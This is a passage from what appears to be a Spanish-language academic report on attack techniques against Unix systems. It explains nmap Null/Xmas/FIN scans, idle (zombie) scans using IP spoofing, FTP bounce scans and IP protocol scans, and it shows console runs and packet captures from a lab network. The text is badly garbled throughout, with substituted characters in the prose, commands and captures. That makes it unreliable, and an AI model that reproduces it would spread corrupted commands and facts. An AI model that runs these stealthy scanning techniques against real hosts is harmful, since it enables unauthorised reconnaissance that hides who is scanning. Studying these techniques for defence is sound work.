+O :os /ireIalls o dis"ositivos de /iltrado de "aquetes bsica ente se categorizan en varios gru"os# de acuerdo a cun so/isticados son ' qu caracter)sticas "oseen% C statelessD o Csin estadoD# CstatefulD o Ccon estadoD# ' "or Glti o los de Cca"a de a"licaci8nD. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&FireIall +0 :a i "le entaci8n del stac6 FC!&7! de B,5 es la versi8n de re/erencia ' s e9tendida de los algorit os es"eci/icados "or los <FC ;aunque $a' otras># incluso $asta ,?s con arquitecturas di/erentes co o 4indoIs# la usan. :a versi8n actual ;vigente desde *00.> es la <eno FC! ' su versi8n "osterior# 1.1B,5(:ite. Ler% $tt"%&&es.Ii6i"edia.org&Ii6i&7 "le entacionesUdeUFC! Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 10 de 22O
brevedad s8lo se
uestra aqu) una Gnica ca"tura ;la @ro. O>H el resto ;@ros. 0 a **>
estn dis"onibles en el Ane9o B>. En las ca"turas de tr/ico "uede verse que justa ente# salvo "ara el "uerto abierto 22 ;donde no $a' res"uesta alguna># la res"uesta del $ost *02.*JO...-. es un <,F_ACR.
marcelo@saturno:~/src/nmap/bin$ ((4(54)0 u7o .;nmap - N 19(.16).0.30 -p
.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+( #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p openFfi"tere7 ' (5;t!p !"o e7 mtp )0;t!p !"o e7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1.5+1 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - 3 19(.16).0.30 -p ((4(54)0 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+3 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p !"o e7 ' (5;t!p !"o e7 mtp )0;t!p !"o e7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 0.393 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - G 19(.16).0.30 -p (0-(( .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:++ #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< (0;t!p !"o e7 ftp-7ata (1;t!p !"o e7 ftp ((;t!p openFfi"tere7 ' 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1.677 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - B 19(.16).0.30 -p ((41104)0)0 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+5 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p openFfi"tere7 ' 110;t!p !"o e7 pop3 )0)0;t!p !"o e7 'ttp-proDE 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 1.5+3 e!on7
Consola 5% Escaneos @ull# Mai on# A as ' Fin al $ost *02.*JO...-. res"ectiva ente
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5. de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5* de 22O
env)o&rece"ci8n de tr/icoO. ' es el que real ente actGa co o origen de los "aquetes de "rueba "ara el destino. ,i bien es un "roceso algo largo# "uede resu irse en los siguientes "asos# su"oniendo co o =ost A el origen# B el zo bie ' C el destino. 7. A co "rueba% a> :a "redictibilidad en la generaci8n del ca "o 75 de 7!O* de B ;7!(75 de a$ora en s>. Es decir# el "ort scanner en A c$equea que B utilice algGn algorit o "redecible ;nor al ente nG eros secuenciales> "ara identi/icar ;o C arcarD> los "aquetes 7!. Esto lo $ace envindole varios "aquetes ,K@_ACR "ara obtener <,Fs ' c$equear que los 7!(75 de las res"uestas son e/ectiva ente sucesivos ;o "redecibles al BD. b> Al enviarle dic$os "aquetes ,K@_ACR ' recibir los res"ectivos <,F desde B# A ta bin veri/ica que B est sin tr/ico# 'a que de otra anera# los 7!(75s no ser)an secuenciales. +. ,i B "asa las "ruebas que $ace A# entonces B es adecuado "ara utilizar co o Qo bie ' se guarda el Glti o 7!(75 recibido. ;. El "ort scanner en A le env)a directa ente a C "aquetes ,K@ $aciendo ,"oo/ing de la 7!O- de B. 5ic$os "aquetes enviados son# en realidad# el escaneo de "uertos real ;es un ,'n ,can nor al# van dirigidos a los "uertos que a A le interesa saber su estado>H la di/erencia se encuentra en que A sabe que al $aber $ec$o s"oo/ing de la 7! de B# las res"uestas de C no sern devueltas a A# sino que irn destinadas a B ;"aso 1>. <. C# al recibir un "aquete con ,K@ Cdesde BD ;aunque en realidad sea A># va co "ortarse co o un rece"tor clsico de un ,K@ ,can% si el "uerto
O. 5e aqu) "roviene el no bre de 6dle Scan# es decir# idle signi/ica CinactivoD en ingls. O* El Ca "o 75 del encabezado 7! es utilizado "ara /rag entar los datagra as en algGn "unto de la co unicaci8n ' reensa blarlos en otro. ,e utilizan nG eros secuenciales "ara relacionar un Gnico seg ento de Ca"a 1 en varios datagra as 7! de Ca"a -. Ler SFC!&7!U7llT# Ca". **.5. O2 !ara s in/or aci8n sobre el algorit o que utiliza @ a" "ara averiguar si el 7!(75 es odi/ica el ca "o corres"ondiente a la direcci8n 7! de "redecible# ver% $tt"%&&n a".org&osdetect&osdetect( et$ods.$t lcosdetect(ti O- !ara $cer s"oo/ing de una 7!# @ a" ?rigen del encabezado de los "aquetes que env)a. Ler S7!U,!??FT. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 52 de 22O
enos O2>.
destino est abierto# intentar iniciar la cone9i8n envindole a B un ,K@_ACR. ,i el "uerto est cerrado# le devolver un <,F_ACR. . B# al no $aber iniciado cone9i8n alguna con C ' recibir un "aquete "roveniente de l# to a uno de los dos ca inos% a> ,i recibe un ,K@_ACR desde C ;'a que el "uerto en C est abierto># "ara B esto no tiene sentidoH in ediata ente le env)a a C un <,F# incrementando el I4.ID en uno ;o generando un valor nuevo "redecible "or A>. C con esto cierra la cone9i8n alf'open ;C edia abiertaD>. b> ,i recibe un <,F_ACR ;'a que el "uerto en C est cerrado># "ara B esto es tr/ico CnuloD# es decir# ignora el "aquete. #. :uego de unos instantes de de ora# A vuelve a C"reguntarD el nG ero actual de 7!(75 de B# ' nueva ente# $a' dos alternativas% a> El 7!(75 se incre ent8 en uno% entonces el "uerto en C est abierto "ara B. b> El 7!(75 no se incre ent8% entonces el "uerto en C est cerrado o /iltrado. Fjemplo ! /aptura de un Idle Acan%
marcelo@saturno:~/src/nmap/bin$ u7o nmap - 8 19(.16).0.30 19(.16).0.100 -p ((4(5 &#$N8NH: 3anE peop"e u e -P0 >;87"e !an to pre@ent ping from t'eir true 8P. On t'e ot'er 'an74 timing info Nmap gain from ping !an a""o> for fa ter4 more re"iab"e !an . .tarting Nmap +.(0 9 'ttp:;;in e!ure.org : at (00)-03-06 13:(3 #$.T Idlescan using zombie 192.168.0. 0 !192.168.0. 0:80"# $lass: Incremental 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< ((;t!p !"o e7Ffi"tere7 ' (5;t!p open mtp 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap fini 'e7: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 3.+)+ e!on7
En la consola J se
,canH en este caso "ara veri/icar si los "uertos 22 ' 25 estn abiertos en el $ost *02.*JO...*.. utilizando co o Qo bie a *02.*JO...-.. !ara "oder co "render la ca"tura de tr/ico# $a' que recordar que el =ost A tiene la MAC address
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5- de 22O
..%*+%-*%0J%5b%*/# el =ost B la MAC ..%.c%20%e*%a2%2J ' el =ost C la MAC ..%.c%20%0.%2a%2d. <elacionar la 7! con cada $ost "uede ser engaBoso# 'a que A utilizar las tres direcciones 7! de /or a indistinta.
... Paquete nro. 3 - Tiempo 0.0(9939 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:7))( Brag:02 TT2:37 9...: T,P ?ea7er: .Port:+617+ )*ort:80 .eqN:13(0+0++1 #!6N:(303113(51 +lags:0,12!-%" &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617+ > 19(.16).0.30:>>> .# Paquete nro. + - Tiempo 0.03193( 3a! Origen: 00:0!:(9:e1:a(:(6 !(" -> 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):81 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:80 DPort:+617+ .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617+ $ Paquete nro. 5 - Tiempo 0.065571 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3))03 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6175 )*ort:80 .eqN:13(0+0++( #!6N:(303113(51 +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6175 > 19(.16).0.30:>>> .# Paquete nro. 6 - Tiempo 0.065)0+ 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):82 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:80 DPort:+6175 .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6175 $ ... Paquete nro. 15 - Tiempo 0.19++50 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 192.168.0.100 &' 192.168.0. 0 8P ?ea7er: =er ion:+2 2en:++ 8D:1+395 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 16 - Tiempo 0.19+6(0 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:+0 I):80 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ ...
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 51 de 22O
Paquete nro. (7 - Tiempo 0.653+67 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 192.168.0.2 &' 192.168.0. 0 8P ?ea7er: =er ion:+2 2en:++ 8D:+6(96 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6330 DPort:)0 .eqN:()70071(9( #!6N:397)13361+ +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6330 > 19(.16).0.30:>>> .# Paquete nro. () - Tiempo 0.653739 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 192.168.0. 0 &' 192.168.0.2 8P ?ea7er: =er ion:+2 2en:+0 I):91 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6330 .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6330 $
En la Ca"tura 0 "uede verse en acci8n el "unto *% A "ri ero env)a insistente ente ;varias veces> "aquetes FC! con ,K@_ACR desde su 7!# tratando de deter inar si del <,F de res"uesta# el 75 del encabezado 7! es secuencial. Co o se "uede ver# el 75 "ri ero es O* ' luego O2 ;' as) sucesiva ente "ara cada C"reguntaD# "aquetes - al J>. :uego A $ace s"oo/ing de la 7! de C ' ta bin env)a "ruebas "ara averiguar si la 75 de los <,F siguen siendo secuenciales ;!aquete *5>. !ero co o estas res"uestas son devueltas al =ost C real ;!aquete *J># la Gnica anera de que A co "ruebe la su"osici8n de que los 75 se
Paquete nro. (9 - Tiempo 0.653)51 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:335(0 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:)0 )*ort:21 .eqN:(30079163) #!6N:0 +lags:0,02!-" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. 30 - Tiempo 0.65+0+9 3a! Origen: 00:0!:(9:90:(a:(7 !$" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:21 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 +lags:0,12!-%" &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# ... Paquete nro. 3( - Tiempo 0.65+33+ 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 I):92 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 )*ort:21 .eqN:(300791639 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ ...
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 55 de 22O
incre entaron secuencial ente es volviendo a C"reguntarD co o al co ienzo ;!aquetes 2+ ' 2O>. All) /inaliz8 la eta"a *# ' A CguardaD el Glti o 7!(75 0* antes de $acer el escaneo en s).
Paquete nro. 3+ - Tiempo 0.705565 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:15757 Brag:02 TT2:59 9...: T,P ?ea7er: .Port:+6(+) DPort:)0 .eqN:()7007179( #!6N:397)13361+ +lags:0,12!-%" &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(+) > 19(.16).0.30:>>> .# Paquete nro. 35 - Tiempo 0.705)51 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(+) .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(+) $
Ca"tura *.% Ejecuci8n del 7dle ,can en s)# dado que el "uerto 25 est abierto
Enviar el escaneo de "uertos a C C intiendoD sobre su direcci8n 7! ;aunque se lo "uede CdescubrirD en la ca"tura "or su direcci8n MAC>. ;20> C# co o tiene el "uerto 25 abierto# env)a el ,K@_ACR a B ;-.>. B# co o en ningGn o ento inici8 ninguna cone9i8n# env)a un <,F a C e incrementa su I4.ID a L+ ;-2>.
A vuelve a C"reguntarD a B "or su 7!(75H co o el <,F contiene el 75 0-# A sa(e que el puerto + en / est a(ierto ;'a que si $ubo un 7!(75 02# /ue el <,F que B le envi8 a C $ace un instante>.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5J de 22O
Paquete nro. 36 - Tiempo 0.7059+) 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:15305 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:)0 )*ort:22 .eqN:(30079163) #!6N:0 +lags:0,02!-" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 37 - Tiempo 0.7060)7 3a! Origen: 00:0!:(9:90:(a:(7 !$" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: -*ort:22 DPort:)0 .eqN:0 #!6N:(300791639 +lags:0,1.!/%" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# ... Paquete nro. 39 - Tiempo 0.757+75 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:13500 Brag:02 TT2:56 9...: T,P ?ea7er: .Port:+6376 DPort:)0 .eqN:()7007((9( #!6N:397)13361+ +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6376 > 19(.16).0.30:>>> .# Paquete nro. +0 - Tiempo 0.757751 3a! Origen: 00:0!:(9:e1:a(:(6 !(" -> 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):9. Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6376 .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6376 $
A vuelve a enviar un "aquete ,K@ al "uerto 22 de C C entirosoD con la 7! origen de B ;-J>. Co o el "uerto en C est cerrado# env)a un <,F_ACR a B ;-+>. B no $ace nada# descarta este "aquete. A vuelve a C"reguntarD "or el 7!(75. El 7!(75 no se incre ent8 ;es 01># "or lo que A asu e que B no env)o ningGn <,F luego del "aquete -J. 4or lo tanto% A asume que el puerto ++ en / est cerrado.O1
Bentajas ! Desventajas del Idle Acan @ a" en realidad generaliza en /or a "oco 8"ti a este "roceso "ara varios "uertos# "ero de todas aneras lo ejora ;se co "orta en /or a "arecida a una
s i "ortantes. El O1 ,i bien en el Ane9o B est detallada toda la ca"tura# estos son los "aquetes is os. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5+ de 22O
resto son nuevos intentos ' "ruebas que realiza el @ a"# "ero los resultados siguen siendo los
bGsqueda binaria recursiva>. 2na de las ventajas es que ni C ni su ad inistrador se enteran en ningGn o ento que el escaneo "rovino en realidad de A. ?tra es que A "uede detectar relaciones Cde con/ianzaD entre B ' CH es decir# si C tiene reglas di/erentes "ara B que lo $acen es"ecial ;"or eje "lo# le "er ite "asar cierto tr/ico># A "uede detectarlo. Entre las Clara ente# a'ores desventajas# est la de encontrar un Qo bie adecuado. s all de que B debe utilizar un ,iste a ?"erativo que asigne 7!(
75s "redecibles "ara todo el tr/ico# B debe "oseer algGn "uerto sin /iltrar "ara que A "ueda obtener <,Fs. Fa bin "uede co "licar el tr/ico que tenga B en ese o ento# co o ta bin la cantidad de "aquetes que es necesario interca biar# con el consiguiente consu o de anc$o de banda ' "rdida de tie "o $asta obtener un resultado. !ara s detalles de este escaneo# ver S,@CU75:ET ' S@MA!U75:ET.
is o cliente.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5O de 22O
ta bin lo in/or a ;con un error> que el "ort scanner reconoce# viendo el "uerto del destino co o cerrado. 5ado un esque a si ilar al 7dle ,can anterior ;donde A es el $ost que ejecuta el "ort scanner# B es el ,ervidor FF! ' C el equi"o objetivo># la secuencia de ataque t)"ica es% *. El "ort scanner en A se conecta al FF! ,erver en B. 2. A le env)a un co ando !?<F a B de anera que se conecte a C. ensaje de ?R. -. ,i el FF! en B "er ite la ejecuci8n del co ando !?<F con los "ar etros que se le "asaron# devuelve un co ando 1. :legado este "unto# el "ort scanner usual ente "ide la ejecuci8n del s co Gn del "rotocolo FF!% :7,FH esto es s8lo "ara que el servidor FF! en B e/ectiva ente se conecte al objetivo C e intente enviar un listado de arc$ivos del directorio ;B su"one que en esa 7! ' "uerto $a' otro FF! ,erver>. 5. ,i B tiene 9ito en la cone9i8n ;$ubo un t ree'.a1 ands ake entre B ' C># env)a "or el canal FF! establecido "revia ente un A identi/ica
OO
ensaje de ?R que
J. ,i B no tiene 9ito en la cone9i8n ;al ,K@ de B le sigui8 un <,F_ACR de C o un ti eout "orque el "uerto est /iltrado># B env)a un "or la cone9i8n FF! entre A ' B# ' el "ort scanner cerrado. arca el "uerto co o
OO En el "rotocolo FF!# al igual que en el "rotocolo =FF!# a un co ando del cliente le sigue una res"uesta del servidorH dic$as res"uestas estn de/inidas en los <FC ' estn "recedidas "or un c8digo de ensaje ;un nG ero># ade s del ensaje en /or ato te9to ;'a que en los inicios de a'ores a 2.. son de C?RD# los internet un cliente "od)a ser un usuario $u ano>. :os c8digos
a'ores a 1.. son de CErrorD ' as) sucesiva ente. Ler S47R7UFF!CT. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 50 de 22O
En la Consola + se
el FF! Bounce scan# ' su salida ;cuando las "recondiciones descri"tas ests dadas>. En la Ca"tura *2 se "uede ver la sesi8n FF! co "leta# tanto los co andos que ejecuta el !ort ,canner en A co o las res"uestas del servidor FF! en B.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J. de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J* de 22O
De !rip!i%n: (0 > )0 -%$:0 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( ... Paquete Nro: 39 - Tiempo: 9.17+09+ 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 110 4pening %-$II mode data connection 6or ;/bin/ls;. Paquete Nro: +0 - Tiempo: 9.175116 8P Origen: 192.168.0. 0:21 !(" &' 8P De tino: 192.168.0.2:3+691 !%" Proto!o"o: +2* De !rip!i%n: /esponse: 226 2rans6er complete.
s bajo nivel de c8 o se
co "orta B cuando recibe el co ando FF! :7,F% intenta establecer la cone9i8n# ' en base a eso in/or a a A del resultado. El resto de la ca"tura ;detalles de c8 o se cierran las cone9iones# ' de s> se "uede encontrar en el Ane9o B. Este ti"o de escaneo tiene en com'n con el Idle Acan )ran parte de las ventajas ! desventajas. @ueva ente# la ventaja de este ti"o de escaneo 'ace en la i "osibilidad de que C deter ine que el escaneo "roven)a de B# as) co o ta bin la no necesidad de que el "ort scanner A se ejecute con "rivilegios de ad inistrador. :a enor e desventaja de este ti"o de escaneo reside en la )ran di=icultad de encontrar un 2T4 Aerver con este CagujeroD de seguridad ; uc$o s di/)cil que encontrar un CQo bieD "ara la tcnica anterior>. Casi todos los servidores FF! conocidos $acen ;"or de/ecto ' aGn si "er iten ejecutar el co ando> un c$equeo de la direcci8n 7! del "ar etro !?<F ;veri/ican si la 7! es igual a la del cliente># i "idiendo esta co unicaci8n C,erver to ,erverD. As) ' todo# en la a'or)a es "osible C/orzarD este co "orta iento ;"er itido en el <FC>. !or eje "lo# "ara el servidor FF! de FreeB,5 O0 $a' que agregar el "ar etro C(<D a la l)nea C/t"dU/lagsD del arc$ivo &etc&de/aults&rc.con/. En otro servidor co o vs/t"d0.# dic$o "er iso sobre el co ando !?<F $a' que $abilitarlo con la l)nea de con/iguraci8n C"ortU"ro iscuousaKE,DH as) ' todo# al
O0 FreeB,5 incor"ora un servidor FF! en su so/tIare de base. Ler% $tt"%&&III./reebsd.org&doc&enU2,.7,?OO50(*&boo6s&$andboo6&netIor6(/t".$t l 0. Ls/t"d ;Ver1 Secure F-P (aemon> es uno de los servidores FF! inclu'e "or de/ecto en la s di/undidos 'a que se a'or)a de las distribuciones :inu9. Ler% $tt"%&&vs/t"d.beasts.org&
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J2 de 22O
utilizar vs/t"d co o 5ounce Server# el ataque /alla. Ls/t"d "arece nunca retornar un c8digo di/erente de 2.. ;?R> a "esar de que su cone9i8n al objetivo /ue rec$azada con un <,F.
220 !<s+2*d 2.0.." K.<$ anonEmou 1 P"ea e pe!ifE t'e pa >or7. P#.. ->>>u erI 2 0 2ogin u!!e fu". PO$T 19(416)404100404)0 200 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. 28.T 110 ?ere !ome t'e 7ire!torE "i ting. 226 Dire!torE en7 O5. PO$T 19(416)4041004+43( 200 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. 28.T 110 ?ere !ome t'e 7ire!torE "i ting. 226 Dire!torE en7 O5. 100 OOP.:
Ca"tura *1% ,esi8n de ataque de un servidor L,FF!5 con/igurado "ara ser vulnerable
:uego vs/t"d# al no in/or ar del /allo en su cone9i8n al "uerto *.5J ;cerrado> de la 7! *02.*JO...*..# @ a" CcreeD que dic$o "uerto est abierto# cuando en realidad est cerrado%
marcelo@saturno:~/src/nmap/bin$ ./nmap &b 192.168.0.60 192.168.0.100 &p 8051016 ?int: if Eour boun!e !an target 'o t arenJt rea!'ab"e from 'ere4 remember to u e -PN o >e 7onJt trE an7 ping t'em prior to t'e !an .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 (0:19 #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< )0;t!p open 'ttp 1056;t!p open un6no>n Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1+.169 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - . 19(.16).0.100 -p )041056 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 (0:(( #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< )0;t!p open 'ttp 1016/tcp closed un=no>n 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.+(6 e!on7
Consola O% FF! Bounce ,can a un servidor L,FF!5 ' un ,'n ,can co o "rueba del error
Co o "uede a"reciarse# aGn cuando se con/igure Ca "ro"8sitoD un servidor FF! "ara que "er ita este ti"o de cone9iones C,ervidor a ,ervidorD ;FA!># "or
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J- de 22O
res"eto al estndar o "or alguna necesidad en concreto# es e9tre ada ente di/)cil $o' en d)a que un escaneo de "uertos con este todo sea e/ectivo ' con/iable.
25! ,can ;en que si se tiene res"uesta es "orque el "rotocolo no est dis"onible>. En caso de que no se obtenga res"uesta# o si se obtiene algo di/erente al "aquete 7CM! de C!rotocolo @o 5is"onibleD# se di/erente al c8digo 2 ;c8digos *# -# 0# *. o *-># se =iltrado ;aunque sea real ente un caso e9traBo>. :as tres e9ce"ciones son los "rotocolos 7CM!# FC! ' 25!# que co o @ a" 'a sabe c8 o anejarlas# les env)a un "a'load en su Cest) uloD "ara au entar la con/ianza de los resultados.
marcelo@saturno:~/src/nmap/bin$ -p 1-+1 -r u7o .;nmap - O 19(.16).0.60 --rea on
a(ierto. !or Glti o# si se recibe otro ti"o de error 7CM! Fi"o - C2nreac$ableD
.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 ((:53 #$.T 8ntere ting proto!o" on trueno 919(.16).0.60:: Not 'o>n: 36 !"o e7 proto!o" $ea on: 36 proto-unrea!'e P$OTO,O2 .T#T< .<$=8,< $<#.ON 1 open i!mp port-unrea!' ( openFfi"tere7 igmp no-re pon e 6 open t!p proto-re pon e 17 open u7p port-unrea!' +1 openFfi"tere7 ip@6 no-re pon e 3#, #77re : 00:0,:(9:#6:)0:D) 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in (6.170 e!on7
